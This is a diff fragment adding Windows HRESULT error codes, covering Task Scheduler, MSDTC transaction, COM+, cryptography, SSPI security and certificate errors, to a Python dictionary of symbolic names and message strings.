+ 0x80041314: ("SCHED_E_UNSUPPORTED_ACCOUNT_OPTION", "The task has been configured with an unsupported combination of account settings and run-time options."),
+ 0x80041315: ("SCHED_E_SERVICE_NOT_RUNNING", "The Task Scheduler service is not running."),
+ 0x80041316: ("SCHED_E_UNEXPECTEDNODE", "The task XML contains an unexpected node."),
+ 0x80041317: ("SCHED_E_NAMESPACE", "The task XML contains an element or attribute from an unexpected namespace."),
+ 0x80041318: ("SCHED_E_INVALIDVALUE", "The task XML contains a value that is incorrectly formatted or out of range."),
+ 0x80041319: ("SCHED_E_MISSINGNODE", "The task XML is missing a required element or attribute."),
+ 0x8004131A: ("SCHED_E_MALFORMEDXML", "The task XML is malformed."),
+ 0x8004131D: ("SCHED_E_TOO_MANY_NODES", "The task XML contains too many nodes of the same type."),
+ 0x8004131E: ("SCHED_E_PAST_END_BOUNDARY", "The task cannot be started after the trigger's end boundary."),
+ 0x8004131F: ("SCHED_E_ALREADY_RUNNING", "An instance of this task is already running."),
+ 0x80041320: ("SCHED_E_USER_NOT_LOGGED_ON", "The task will not run because the user is not logged on."),
+ 0x80041321: ("SCHED_E_INVALID_TASK_HASH", "The task image is corrupt or has been tampered with."),
+ 0x80041322: ("SCHED_E_SERVICE_NOT_AVAILABLE", "The Task Scheduler service is not available."),
+ 0x80041323: ("SCHED_E_SERVICE_TOO_BUSY", "The Task Scheduler service is too busy to handle your request. Try again later."),
+ 0x80041324: ("SCHED_E_TASK_ATTEMPTED", "The Task Scheduler service attempted to run the task, but the task did not run due to one of the constraints in the task definition."),
+ 0x8004D000: ("XACT_E_ALREADYOTHERSINGLEPHASE", "Another single phase resource manager has already been enlisted in this transaction."),
+ 0x8004D001: ("XACT_E_CANTRETAIN", "A retaining commit or abort is not supported."),
+ 0x8004D002: ("XACT_E_COMMITFAILED", "The transaction failed to commit for an unknown reason. The transaction was aborted."),
+ 0x8004D003: ("XACT_E_COMMITPREVENTED", "Cannot call commit on this transaction object because the calling application did not initiate the transaction."),
+ 0x8004D004: ("XACT_E_HEURISTICABORT", "Instead of committing, the resource heuristically aborted."),
+ 0x8004D005: ("XACT_E_HEURISTICCOMMIT", "Instead of aborting, the resource heuristically committed."),
+ 0x8004D006: ("XACT_E_HEURISTICDAMAGE", "Some of the states of the resource were committed while others were aborted, likely because of heuristic decisions."),
+ 0x8004D007: ("XACT_E_HEURISTICDANGER", "Some of the states of the resource may have been committed while others may have been aborted, likely because of heuristic decisions."),
+ 0x8004D008: ("XACT_E_ISOLATIONLEVEL", "The requested isolation level is not valid or supported."),
+ 0x8004D009: ("XACT_E_NOASYNC", "The transaction manager does not support an asynchronous operation for this method."),
+ 0x8004D00A: ("XACT_E_NOENLIST", "Unable to enlist in the transaction."),
+ 0x8004D00B: ("XACT_E_NOISORETAIN", "The requested semantics of retention of isolation across retaining commit and abort boundaries cannot be supported by this transaction implementation, or isoFlags was not equal to 0."),
+ 0x8004D00C: ("XACT_E_NORESOURCE", "There is no resource presently associated with this enlistment."),
+ 0x8004D00D: ("XACT_E_NOTCURRENT", "The transaction failed to commit due to the failure of optimistic concurrency control in at least one of the resource managers."),
+ 0x8004D00E: ("XACT_E_NOTRANSACTION", "The transaction has already been implicitly or explicitly committed or aborted."),
+ 0x8004D00F: ("XACT_E_NOTSUPPORTED", "An invalid combination of flags was specified."),
+ 0x8004D010: ("XACT_E_UNKNOWNRMGRID", "The resource manager ID is not associated with this transaction or the transaction manager."),
+ 0x8004D011: ("XACT_E_WRONGSTATE", "This method was called in the wrong state."),
+ 0x8004D012: ("XACT_E_WRONGUOW", "The indicated unit of work does not match the unit of work expected by the resource manager."),
+ 0x8004D013: ("XACT_E_XTIONEXISTS", "An enlistment in a transaction already exists."),
+ 0x8004D014: ("XACT_E_NOIMPORTOBJECT", "An import object for the transaction could not be found."),
+ 0x8004D015: ("XACT_E_INVALIDCOOKIE", "The transaction cookie is invalid."),
+ 0x8004D016: ("XACT_E_INDOUBT", "The transaction status is in doubt. A communication failure occurred, or a transaction manager or resource manager has failed."),
+ 0x8004D017: ("XACT_E_NOTIMEOUT", "A time-out was specified, but time-outs are not supported."),
+ 0x8004D018: ("XACT_E_ALREADYINPROGRESS", "The requested operation is already in progress for the transaction."),
+ 0x8004D019: ("XACT_E_ABORTED", "The transaction has already been aborted."),
+ 0x8004D01A: ("XACT_E_LOGFULL", "The Transaction Manager returned a log full error."),
+ 0x8004D01B: ("XACT_E_TMNOTAVAILABLE", "The transaction manager is not available."),
+ 0x8004D01C: ("XACT_E_CONNECTION_DOWN", "A connection with the transaction manager was lost."),
+ 0x8004D01D: ("XACT_E_CONNECTION_DENIED", "A request to establish a connection with the transaction manager was denied."),
+ 0x8004D01E: ("XACT_E_REENLISTTIMEOUT", "Resource manager reenlistment to determine transaction status timed out."),
+ 0x8004D01F: ("XACT_E_TIP_CONNECT_FAILED", "The transaction manager failed to establish a connection with another Transaction Internet Protocol (TIP) transaction manager."),
+ 0x8004D020: ("XACT_E_TIP_PROTOCOL_ERROR", "The transaction manager encountered a protocol error with another TIP transaction manager."),
+ 0x8004D021: ("XACT_E_TIP_PULL_FAILED", "The transaction manager could not propagate a transaction from another TIP transaction manager."),
+ 0x8004D022: ("XACT_E_DEST_TMNOTAVAILABLE", "The transaction manager on the destination machine is not available."),
+ 0x8004D023: ("XACT_E_TIP_DISABLED", "The transaction manager has disabled its support for TIP."),
+ 0x8004D024: ("XACT_E_NETWORK_TX_DISABLED", "The transaction manager has disabled its support for remote or network transactions."),
+ 0x8004D025: ("XACT_E_PARTNER_NETWORK_TX_DISABLED", "The partner transaction manager has disabled its support for remote or network transactions."),
+ 0x8004D026: ("XACT_E_XA_TX_DISABLED", "The transaction manager has disabled its support for XA transactions."),
+ 0x8004D027: ("XACT_E_UNABLE_TO_READ_DTC_CONFIG", "Microsoft Distributed Transaction Coordinator (MSDTC) was unable to read its configuration information."),
+ 0x8004D028: ("XACT_E_UNABLE_TO_LOAD_DTC_PROXY", "MSDTC was unable to load the DTC proxy DLL."),
+ 0x8004D029: ("XACT_E_ABORTING", "The local transaction has aborted."),
+ 0x8004D080: ("XACT_E_CLERKNOTFOUND", "The specified CRM clerk was not found. It may have completed before it could be held."),
+ 0x8004D081: ("XACT_E_CLERKEXISTS", "The specified CRM clerk does not exist."),
+ 0x8004D082: ("XACT_E_RECOVERYINPROGRESS", "Recovery of the CRM log file is still in progress."),
+ 0x8004D083: ("XACT_E_TRANSACTIONCLOSED", "The transaction has completed, and the log records have been discarded from the log file. They are no longer available."),
+ 0x8004D084: ("XACT_E_INVALIDLSN", "lsnToRead is outside of the current limits of the log"),
+ 0x8004D085: ("XACT_E_REPLAYREQUEST", "The COM+ Compensating Resource Manager has records it wishes to replay."),
+ 0x8004D100: ("XACT_E_CONNECTION_REQUEST_DENIED", "The request to connect to the specified transaction coordinator was denied."),
+ 0x8004D101: ("XACT_E_TOOMANY_ENLISTMENTS", "The maximum number of enlistments for the specified transaction has been reached."),
+ 0x8004D102: ("XACT_E_DUPLICATE_GUID", "A resource manager with the same identifier is already registered with the specified transaction coordinator."),
+ 0x8004D103: ("XACT_E_NOTSINGLEPHASE", "The prepare request given was not eligible for single-phase optimizations."),
+ 0x8004D104: ("XACT_E_RECOVERYALREADYDONE", "RecoveryComplete has already been called for the given resource manager."),
+ 0x8004D105: ("XACT_E_PROTOCOL", "The interface call made was incorrect for the current state of the protocol."),
+ 0x8004D106: ("XACT_E_RM_FAILURE", "The xa_open call failed for the XA resource."),
+ 0x8004D107: ("XACT_E_RECOVERY_FAILED", "The xa_recover call failed for the XA resource."),
+ 0x8004D108: ("XACT_E_LU_NOT_FOUND", "The logical unit of work specified cannot be found."),
+ 0x8004D109: ("XACT_E_DUPLICATE_LU", "The specified logical unit of work already exists."),
+ 0x8004D10A: ("XACT_E_LU_NOT_CONNECTED", "Subordinate creation failed. The specified logical unit of work was not connected."),
+ 0x8004D10B: ("XACT_E_DUPLICATE_TRANSID", "A transaction with the given identifier already exists."),
+ 0x8004D10C: ("XACT_E_LU_BUSY", "The resource is in use."),
+ 0x8004D10D: ("XACT_E_LU_NO_RECOVERY_PROCESS", "The LU Recovery process is down."),
+ 0x8004D10E: ("XACT_E_LU_DOWN", "The remote session was lost."),
+ 0x8004D10F: ("XACT_E_LU_RECOVERING", "The resource is currently recovering."),
+ 0x8004D110: ("XACT_E_LU_RECOVERY_MISMATCH", "There was a mismatch in driving recovery."),
+ 0x8004D111: ("XACT_E_RM_UNAVAILABLE", "An error occurred with the XA resource."),
+ 0x8004E002: ("CONTEXT_E_ABORTED", "The root transaction wanted to commit, but the transaction aborted."),
+ 0x8004E003: ("CONTEXT_E_ABORTING", "The COM+ component on which the method call was made has a transaction that has already aborted or is in the process of aborting."),
+ 0x8004E004: ("CONTEXT_E_NOCONTEXT", "There is no Microsoft Transaction Server (MTS) object context."),
+ 0x8004E005: ("CONTEXT_E_WOULD_DEADLOCK", "The component is configured to use synchronization, and this method call would cause a deadlock to occur."),
+ 0x8004E006: ("CONTEXT_E_SYNCH_TIMEOUT", "The component is configured to use synchronization, and a thread has timed out waiting to enter the context."),
+ 0x8004E007: ("CONTEXT_E_OLDREF", "You made a method call on a COM+ component that has a transaction that has already committed or aborted."),
+ 0x8004E00C: ("CONTEXT_E_ROLENOTFOUND", "The specified role was not configured for the application."),
+ 0x8004E00F: ("CONTEXT_E_TMNOTAVAILABLE", "COM+ was unable to talk to the MSDTC."),
+ 0x8004E021: ("CO_E_ACTIVATIONFAILED", "An unexpected error occurred during COM+ activation."),
+ 0x8004E022: ("CO_E_ACTIVATIONFAILED_EVENTLOGGED", "COM+ activation failed. Check the event log for more information."),
+ 0x8004E023: ("CO_E_ACTIVATIONFAILED_CATALOGERROR", "COM+ activation failed due to a catalog or configuration error."),
+ 0x8004E024: ("CO_E_ACTIVATIONFAILED_TIMEOUT", "COM+ activation failed because the activation could not be completed in the specified amount of time."),
+ 0x8004E025: ("CO_E_INITIALIZATIONFAILED", "COM+ activation failed because an initialization function failed. Check the event log for more information."),
+ 0x8004E026: ("CONTEXT_E_NOJIT", "The requested operation requires that just-in-time (JIT) be in the current context, and it is not."),
+ 0x8004E027: ("CONTEXT_E_NOTRANSACTION", "The requested operation requires that the current context have a transaction, and it does not."),
+ 0x8004E028: ("CO_E_THREADINGMODEL_CHANGED", "The components threading model has changed after install into a COM+ application. Re-install component."),
+ 0x8004E029: ("CO_E_NOIISINTRINSICS", "Internet Information Services (IIS) intrinsics not available. Start your work with IIS."),
+ 0x8004E02A: ("CO_E_NOCOOKIES", "An attempt to write a cookie failed."),
+ 0x8004E02B: ("CO_E_DBERROR", "An attempt to use a database generated a database-specific error."),
+ 0x8004E02C: ("CO_E_NOTPOOLED", "The COM+ component you created must use object pooling to work."),
+ 0x8004E02D: ("CO_E_NOTCONSTRUCTED", "The COM+ component you created must use object construction to work correctly."),
+ 0x8004E02E: ("CO_E_NOSYNCHRONIZATION", "The COM+ component requires synchronization, and it is not configured for it."),
+ 0x8004E02F: ("CO_E_ISOLEVELMISMATCH", "The TxIsolation Level property for the COM+ component being created is stronger than the TxIsolationLevel for the root."),
+ 0x8004E030: ("CO_E_CALL_OUT_OF_TX_SCOPE_NOT_ALLOWED", "The component attempted to make a cross-context call between invocations of EnterTransactionScope and ExitTransactionScope. This is not allowed. Cross-context calls cannot be made while inside a transaction scope."),
+ 0x8004E031: ("CO_E_EXIT_TRANSACTION_SCOPE_NOT_CALLED", "The component made a call to EnterTransactionScope, but did not make a corresponding call to ExitTransactionScope before returning."),
+ 0x80070005: ("E_ACCESSDENIED", "General access denied error."),
+ 0x8007000E: ("E_OUTOFMEMORY", "The server does not have enough memory for the new channel."),
+ 0x80070032: ("ERROR_NOT_SUPPORTED", "The server cannot support a client request for a dynamic virtual channel."),
+ 0x80070057: ("E_INVALIDARG", "One or more arguments are invalid."),
+ 0x80080001: ("CO_E_CLASS_CREATE_FAILED", "Attempt to create a class object failed."),
+ 0x80080002: ("CO_E_SCM_ERROR", "OLE service could not bind object."),
+ 0x80080003: ("CO_E_SCM_RPC_FAILURE", "RPC communication failed with OLE service."),
+ 0x80080004: ("CO_E_BAD_PATH", "Bad path to object."),
+ 0x80080005: ("CO_E_SERVER_EXEC_FAILURE", "Server execution failed."),
+ 0x80080006: ("CO_E_OBJSRV_RPC_FAILURE", "OLE service could not communicate with the object server."),
+ 0x80080007: ("MK_E_NO_NORMALIZED", "Moniker path could not be normalized."),
+ 0x80080008: ("CO_E_SERVER_STOPPING", "Object server is stopping when OLE service contacts it."),
+ 0x80080009: ("MEM_E_INVALID_ROOT", "An invalid root block pointer was specified."),
+ 0x80080010: ("MEM_E_INVALID_LINK", "An allocation chain contained an invalid link pointer."),
+ 0x80080011: ("MEM_E_INVALID_SIZE", "The requested allocation size was too large."),
+ 0x80080015: ("CO_E_MISSING_DISPLAYNAME", "The activation requires a display name to be present under the class identifier (CLSID) key."),
+ 0x80080016: ("CO_E_RUNAS_VALUE_MUST_BE_AAA", "The activation requires that the RunAs value for the application is Activate As Activator."),
+ 0x80080017: ("CO_E_ELEVATION_DISABLED", "The class is not configured to support elevated activation."),
+ 0x80090001: ("NTE_BAD_UID", "Bad UID."),
+ 0x80090002: ("NTE_BAD_HASH", "Bad hash."),
+ 0x80090003: ("NTE_BAD_KEY", "Bad key."),
+ 0x80090004: ("NTE_BAD_LEN", "Bad length."),
+ 0x80090005: ("NTE_BAD_DATA", "Bad data."),
+ 0x80090006: ("NTE_BAD_SIGNATURE", "Invalid signature."),
+ 0x80090007: ("NTE_BAD_VER", "Bad version of provider."),
+ 0x80090008: ("NTE_BAD_ALGID", "Invalid algorithm specified."),
+ 0x80090009: ("NTE_BAD_FLAGS", "Invalid flags specified."),
+ 0x8009000A: ("NTE_BAD_TYPE", "Invalid type specified."),
+ 0x8009000B: ("NTE_BAD_KEY_STATE", "Key not valid for use in specified state."),
+ 0x8009000C: ("NTE_BAD_HASH_STATE", "Hash not valid for use in specified state."),
+ 0x8009000D: ("NTE_NO_KEY", "Key does not exist."),
+ 0x8009000E: ("NTE_NO_MEMORY", "Insufficient memory available for the operation."),
+ 0x8009000F: ("NTE_EXISTS", "Object already exists."),
+ 0x80090010: ("NTE_PERM", "Access denied."),
+ 0x80090011: ("NTE_NOT_FOUND", "Object was not found."),
+ 0x80090012: ("NTE_DOUBLE_ENCRYPT", "Data already encrypted."),
+ 0x80090013: ("NTE_BAD_PROVIDER", "Invalid provider specified."),
+ 0x80090014: ("NTE_BAD_PROV_TYPE", "Invalid provider type specified."),
+ 0x80090015: ("NTE_BAD_PUBLIC_KEY", "Provider's public key is invalid."),
+ 0x80090016: ("NTE_BAD_KEYSET", "Key set does not exist."),
+ 0x80090017: ("NTE_PROV_TYPE_NOT_DEF", "Provider type not defined."),
+ 0x80090018: ("NTE_PROV_TYPE_ENTRY_BAD", "The provider type, as registered, is invalid."),
+ 0x80090019: ("NTE_KEYSET_NOT_DEF", "The key set is not defined."),
+ 0x8009001A: ("NTE_KEYSET_ENTRY_BAD", "The key set, as registered, is invalid."),
+ 0x8009001B: ("NTE_PROV_TYPE_NO_MATCH", "Provider type does not match registered value."),
+ 0x8009001C: ("NTE_SIGNATURE_FILE_BAD", "The digital signature file is corrupt."),
+ 0x8009001D: ("NTE_PROVIDER_DLL_FAIL", "Provider DLL failed to initialize correctly."),
+ 0x8009001E: ("NTE_PROV_DLL_NOT_FOUND", "Provider DLL could not be found."),
+ 0x8009001F: ("NTE_BAD_KEYSET_PARAM", "The keyset parameter is invalid."),
+ 0x80090020: ("NTE_FAIL", "An internal error occurred."),
+ 0x80090021: ("NTE_SYS_ERR", "A base error occurred."),
+ 0x80090022: ("NTE_SILENT_CONTEXT", "Provider could not perform the action because the context was acquired as silent."),
+ 0x80090023: ("NTE_TOKEN_KEYSET_STORAGE_FULL", "The security token does not have storage space available for an additional container."),
+ 0x80090024: ("NTE_TEMPORARY_PROFILE", "The profile for the user is a temporary profile."),
+ 0x80090025: ("NTE_FIXEDPARAMETER", "The key parameters could not be set because the configuration service provider (CSP) uses fixed parameters."),
+ 0x80090026: ("NTE_INVALID_HANDLE", "The supplied handle is invalid."),
+ 0x80090027: ("NTE_INVALID_PARAMETER", "The parameter is incorrect."),
+ 0x80090028: ("NTE_BUFFER_TOO_SMALL", "The buffer supplied to a function was too small."),
+ 0x80090029: ("NTE_NOT_SUPPORTED", "The requested operation is not supported."),
+ 0x8009002A: ("NTE_NO_MORE_ITEMS", "No more data is available."),
+ 0x8009002B: ("NTE_BUFFERS_OVERLAP", "The supplied buffers overlap incorrectly."),
+ 0x8009002C: ("NTE_DECRYPTION_FAILURE", "The specified data could not be decrypted."),
+ 0x8009002D: ("NTE_INTERNAL_ERROR", "An internal consistency check failed."),
+ 0x8009002E: ("NTE_UI_REQUIRED", "This operation requires input from the user."),
+ 0x8009002F: ("NTE_HMAC_NOT_SUPPORTED", "The cryptographic provider does not support Hash Message Authentication Code (HMAC)."),
+ 0x80090300: ("SEC_E_INSUFFICIENT_MEMORY", "Not enough memory is available to complete this request."),
+ 0x80090301: ("SEC_E_INVALID_HANDLE", "The handle specified is invalid."),
+ 0x80090302: ("SEC_E_UNSUPPORTED_FUNCTION", "The function requested is not supported."),
+ 0x80090303: ("SEC_E_TARGET_UNKNOWN", "The specified target is unknown or unreachable."),
+ 0x80090304: ("SEC_E_INTERNAL_ERROR", "The Local Security Authority (LSA) cannot be contacted."),
+ 0x80090305: ("SEC_E_SECPKG_NOT_FOUND", "The requested security package does not exist."),
+ 0x80090306: ("SEC_E_NOT_OWNER", "The caller is not the owner of the desired credentials."),
+ 0x80090307: ("SEC_E_CANNOT_INSTALL", "The security package failed to initialize and cannot be installed."),
+ 0x80090308: ("SEC_E_INVALID_TOKEN", "The token supplied to the function is invalid."),
+ 0x80090309: ("SEC_E_CANNOT_PACK", "The security package is not able to marshal the logon buffer, so the logon attempt has failed."),
+ 0x8009030A: ("SEC_E_QOP_NOT_SUPPORTED", "The per-message quality of protection is not supported by the security package."),
+ 0x8009030B: ("SEC_E_NO_IMPERSONATION", "The security context does not allow impersonation of the client."),
+ 0x8009030C: ("SEC_E_LOGON_DENIED", "The logon attempt failed."),
+ 0x8009030D: ("SEC_E_UNKNOWN_CREDENTIALS", "The credentials supplied to the package were not recognized."),
+ 0x8009030E: ("SEC_E_NO_CREDENTIALS", "No credentials are available in the security package."),
+ 0x8009030F: ("SEC_E_MESSAGE_ALTERED", "The message or signature supplied for verification has been altered."),
+ 0x80090310: ("SEC_E_OUT_OF_SEQUENCE", "The message supplied for verification is out of sequence."),
+ 0x80090311: ("SEC_E_NO_AUTHENTICATING_AUTHORITY", "No authority could be contacted for authentication."),
+ 0x80090316: ("SEC_E_BAD_PKGID", "The requested security package does not exist."),
+ 0x80090317: ("SEC_E_CONTEXT_EXPIRED", "The context has expired and can no longer be used."),
+ 0x80090318: ("SEC_E_INCOMPLETE_MESSAGE", "The supplied message is incomplete. The signature was not verified."),
+ 0x80090320: ("SEC_E_INCOMPLETE_CREDENTIALS", "The credentials supplied were not complete and could not be verified. The context could not be initialized."),
+ 0x80090321: ("SEC_E_BUFFER_TOO_SMALL", "The buffers supplied to a function was too small."),
+ 0x80090322: ("SEC_E_WRONG_PRINCIPAL", "The target principal name is incorrect."),
+ 0x80090324: ("SEC_E_TIME_SKEW", "The clocks on the client and server machines are skewed."),
+ 0x80090325: ("SEC_E_UNTRUSTED_ROOT", "The certificate chain was issued by an authority that is not trusted."),
+ 0x80090326: ("SEC_E_ILLEGAL_MESSAGE", "The message received was unexpected or badly formatted."),
+ 0x80090327: ("SEC_E_CERT_UNKNOWN", "An unknown error occurred while processing the certificate."),
+ 0x80090328: ("SEC_E_CERT_EXPIRED", "The received certificate has expired."),
+ 0x80090329: ("SEC_E_ENCRYPT_FAILURE", "The specified data could not be encrypted."),
+ 0x80090330: ("SEC_E_DECRYPT_FAILURE", "The specified data could not be decrypted."),
+ 0x80090331: ("SEC_E_ALGORITHM_MISMATCH", "The client and server cannot communicate because they do not possess a common algorithm."),
+ 0x80090332: ("SEC_E_SECURITY_QOS_FAILED", "The security context could not be established due to a failure in the requested quality of service (for example, mutual authentication or delegation)."),
+ 0x80090333: ("SEC_E_UNFINISHED_CONTEXT_DELETED", "A security context was deleted before the context was completed. This is considered a logon failure."),
+ 0x80090334: ("SEC_E_NO_TGT_REPLY", "The client is trying to negotiate a context and the server requires user-to-user but did not send a ticket granting ticket (TGT) reply."),
+ 0x80090335: ("SEC_E_NO_IP_ADDRESSES", "Unable to accomplish the requested task because the local machine does not have an IP addresses."),
+ 0x80090336: ("SEC_E_WRONG_CREDENTIAL_HANDLE", "The supplied credential handle does not match the credential associated with the security context."),
+ 0x80090337: ("SEC_E_CRYPTO_SYSTEM_INVALID", "The cryptographic system or checksum function is invalid because a required function is unavailable."),
+ 0x80090338: ("SEC_E_MAX_REFERRALS_EXCEEDED", "The number of maximum ticket referrals has been exceeded."),
+ 0x80090339: ("SEC_E_MUST_BE_KDC", "The local machine must be a Kerberos domain controller (KDC), and it is not."),
+ 0x8009033A: ("SEC_E_STRONG_CRYPTO_NOT_SUPPORTED", "The other end of the security negotiation requires strong cryptographics, but it is not supported on the local machine."),
+ 0x8009033B: ("SEC_E_TOO_MANY_PRINCIPALS", "The KDC reply contained more than one principal name."),
+ 0x8009033C: ("SEC_E_NO_PA_DATA", "Expected to find PA data for a hint of what etype to use, but it was not found."),
+ 0x8009033D: ("SEC_E_PKINIT_NAME_MISMATCH", "The client certificate does not contain a valid user principal name (UPN), or does not match the client name in the logon request. Contact your administrator."),
+ 0x8009033E: ("SEC_E_SMARTCARD_LOGON_REQUIRED", "Smart card logon is required and was not used."),
+ 0x8009033F: ("SEC_E_SHUTDOWN_IN_PROGRESS", "A system shutdown is in progress."),
+ 0x80090340: ("SEC_E_KDC_INVALID_REQUEST", "An invalid request was sent to the KDC."),
+ 0x80090341: ("SEC_E_KDC_UNABLE_TO_REFER", "The KDC was unable to generate a referral for the service requested."),
+ 0x80090342: ("SEC_E_KDC_UNKNOWN_ETYPE", "The encryption type requested is not supported by the KDC."),
+ 0x80090343: ("SEC_E_UNSUPPORTED_PREAUTH", "An unsupported pre-authentication mechanism was presented to the Kerberos package."),
+ 0x80090345: ("SEC_E_DELEGATION_REQUIRED", "The requested operation cannot be completed. The computer must be trusted for delegation, and the current user account must be configured to allow delegation."),
+ 0x80090346: ("SEC_E_BAD_BINDINGS", "Client's supplied Security Support Provider Interface (SSPI) channel bindings were incorrect."),
+ 0x80090347: ("SEC_E_MULTIPLE_ACCOUNTS", "The received certificate was mapped to multiple accounts."),
+ 0x80090348: ("SEC_E_NO_KERB_KEY", "No Kerberos key was found."),
+ 0x80090349: ("SEC_E_CERT_WRONG_USAGE", "The certificate is not valid for the requested usage."),
+ 0x80090350: ("SEC_E_DOWNGRADE_DETECTED", "The system detected a possible attempt to compromise security. Ensure that you can contact the server that authenticated you."),
+ 0x80090351: ("SEC_E_SMARTCARD_CERT_REVOKED", "The smart card certificate used for authentication has been revoked. Contact your system administrator. The event log may contain additional information."),
+ 0x80090352: ("SEC_E_ISSUING_CA_UNTRUSTED", "An untrusted certification authority (CA) was detected while processing the smart card certificate used for authentication. Contact your system administrator."),
+ 0x80090353: ("SEC_E_REVOCATION_OFFLINE_C", "The revocation status of the smart card certificate used for authentication could not be determined. Contact your system administrator."),
+ 0x80090354: ("SEC_E_PKINIT_CLIENT_FAILURE", "The smart card certificate used for authentication was not trusted. Contact your system administrator."),
+ 0x80090355: ("SEC_E_SMARTCARD_CERT_EXPIRED", "The smart card certificate used for authentication has expired. Contact your system administrator."),
+ 0x80090356: ("SEC_E_NO_S4U_PROT_SUPPORT", "The Kerberos subsystem encountered an error. A service for user protocol requests was made against a domain controller that does not support services for users."),
+ 0x80090357: ("SEC_E_CROSSREALM_DELEGATION_FAILURE", "An attempt was made by this server to make a Kerberos-constrained delegation request for a target outside the server's realm. This is not supported and indicates a misconfiguration on this server's allowed-to-delegate-to list. Contact your administrator."),
+ 0x80090358: ("SEC_E_REVOCATION_OFFLINE_KDC", "The revocation status of the domain controller certificate used for smart card authentication could not be determined. The system event log contains additional information. Contact your system administrator."),
+ 0x80090359: ("SEC_E_ISSUING_CA_UNTRUSTED_KDC", "An untrusted CA was detected while processing the domain controller certificate used for authentication. The system event log contains additional information. Contact your system administrator."),
+ 0x8009035A: ("SEC_E_KDC_CERT_EXPIRED", "The domain controller certificate used for smart card logon has expired. Contact your system administrator with the contents of your system event log."),
+ 0x8009035B: ("SEC_E_KDC_CERT_REVOKED", "The domain controller certificate used for smart card logon has been revoked. Contact your system administrator with the contents of your system event log."),
+ 0x8009035D: ("SEC_E_INVALID_PARAMETER", "One or more of the parameters passed to the function were invalid."),
+ 0x8009035E: ("SEC_E_DELEGATION_POLICY", "The client policy does not allow credential delegation to the target server."),
+ 0x8009035F: ("SEC_E_POLICY_NLTM_ONLY", "The client policy does not allow credential delegation to the target server with NLTM only authentication."),
+ 0x80091001: ("CRYPT_E_MSG_ERROR", "An error occurred while performing an operation on a cryptographic message."),
+ 0x80091002: ("CRYPT_E_UNKNOWN_ALGO", "Unknown cryptographic algorithm."),
+ 0x80091003: ("CRYPT_E_OID_FORMAT", "The object identifier is poorly formatted."),
+ 0x80091004: ("CRYPT_E_INVALID_MSG_TYPE", "Invalid cryptographic message type."),
+ 0x80091005: ("CRYPT_E_UNEXPECTED_ENCODING", "Unexpected cryptographic message encoding."),
+ 0x80091006: ("CRYPT_E_AUTH_ATTR_MISSING", "The cryptographic message does not contain an expected authenticated attribute."),
+ 0x80091007: ("CRYPT_E_HASH_VALUE", "The hash value is not correct."),
+ 0x80091008: ("CRYPT_E_INVALID_INDEX", "The index value is not valid."),
+ 0x80091009: ("CRYPT_E_ALREADY_DECRYPTED", "The content of the cryptographic message has already been decrypted."),
+ 0x8009100A: ("CRYPT_E_NOT_DECRYPTED", "The content of the cryptographic message has not been decrypted yet."),
+ 0x8009100B: ("CRYPT_E_RECIPIENT_NOT_FOUND", "The enveloped-data message does not contain the specified recipient."),
+ 0x8009100C: ("CRYPT_E_CONTROL_TYPE", "Invalid control type."),
+ 0x8009100D: ("CRYPT_E_ISSUER_SERIALNUMBER", "Invalid issuer or serial number."),
+ 0x8009100E: ("CRYPT_E_SIGNER_NOT_FOUND", "Cannot find the original signer."),
+ 0x8009100F: ("CRYPT_E_ATTRIBUTES_MISSING", "The cryptographic message does not contain all of the requested attributes."),
+ 0x80091010: ("CRYPT_E_STREAM_MSG_NOT_READY", "The streamed cryptographic message is not ready to return data."),
+ 0x80091011: ("CRYPT_E_STREAM_INSUFFICIENT_DATA", "The streamed cryptographic message requires more data to complete the decode operation."),
+ 0x80092001: ("CRYPT_E_BAD_LEN", "The length specified for the output data was insufficient."),
+ 0x80092002: ("CRYPT_E_BAD_ENCODE", "An error occurred during the encode or decode operation."),
+ 0x80092003: ("CRYPT_E_FILE_ERROR", "An error occurred while reading or writing to a file."),
+ 0x80092004: ("CRYPT_E_NOT_FOUND", "Cannot find object or property."),
+ 0x80092005: ("CRYPT_E_EXISTS", "The object or property already exists."),
+ 0x80092006: ("CRYPT_E_NO_PROVIDER", "No provider was specified for the store or object."),
+ 0x80092007: ("CRYPT_E_SELF_SIGNED", "The specified certificate is self-signed."),
+ 0x80092008: ("CRYPT_E_DELETED_PREV", "The previous certificate or certificate revocation list (CRL) context was deleted."),
+ 0x80092009: ("CRYPT_E_NO_MATCH", "Cannot find the requested object."),
+ 0x8009200A: ("CRYPT_E_UNEXPECTED_MSG_TYPE", "The certificate does not have a property that references a private key."),
+ 0x8009200B: ("CRYPT_E_NO_KEY_PROPERTY", "Cannot find the certificate and private key for decryption."),
+ 0x8009200C: ("CRYPT_E_NO_DECRYPT_CERT", "Cannot find the certificate and private key to use for decryption."),
+ 0x8009200D: ("CRYPT_E_BAD_MSG", "Not a cryptographic message or the cryptographic message is not formatted correctly."),
+ 0x8009200E: ("CRYPT_E_NO_SIGNER", "The signed cryptographic message does not have a signer for the specified signer index."),
+ 0x8009200F: ("CRYPT_E_PENDING_CLOSE", "Final closure is pending until additional frees or closes."),
+ 0x80092010: ("CRYPT_E_REVOKED", "The certificate is revoked."),
+ 0x80092011: ("CRYPT_E_NO_REVOCATION_DLL", "No DLL or exported function was found to verify revocation."),
+ 0x80092012: ("CRYPT_E_NO_REVOCATION_CHECK", "The revocation function was unable to check revocation for the certificate."),
+ 0x80092013: ("CRYPT_E_REVOCATION_OFFLINE", "The revocation function was unable to check revocation because the revocation server was offline."),
+ 0x80092014: ("CRYPT_E_NOT_IN_REVOCATION_DATABASE", "The certificate is not in the revocation server's database."),
+ 0x80092020: ("CRYPT_E_INVALID_NUMERIC_STRING", "The string contains a non-numeric character."),
+ 0x80092021: ("CRYPT_E_INVALID_PRINTABLE_STRING", "The string contains a nonprintable character."),
+ 0x80092022: ("CRYPT_E_INVALID_IA5_STRING", "The string contains a character not in the 7-bit ASCII character set."),
+ 0x80092023: ("CRYPT_E_INVALID_X500_STRING", "The string contains an invalid X500 name attribute key, object identifier (OID), value, or delimiter."),
+ 0x80092024: ("CRYPT_E_NOT_CHAR_STRING", "The dwValueType for the CERT_NAME_VALUE is not one of the character strings. Most likely it is either a CERT_RDN_ENCODED_BLOB or CERT_TDN_OCTED_STRING."),
+ 0x80092025: ("CRYPT_E_FILERESIZED", "The Put operation cannot continue. The file needs to be resized. However, there is already a signature present. A complete signing operation must be done."),
+ 0x80092026: ("CRYPT_E_SECURITY_SETTINGS", "The cryptographic operation failed due to a local security option setting."),
+ 0x80092027: ("CRYPT_E_NO_VERIFY_USAGE_DLL", "No DLL or exported function was found to verify subject usage."),
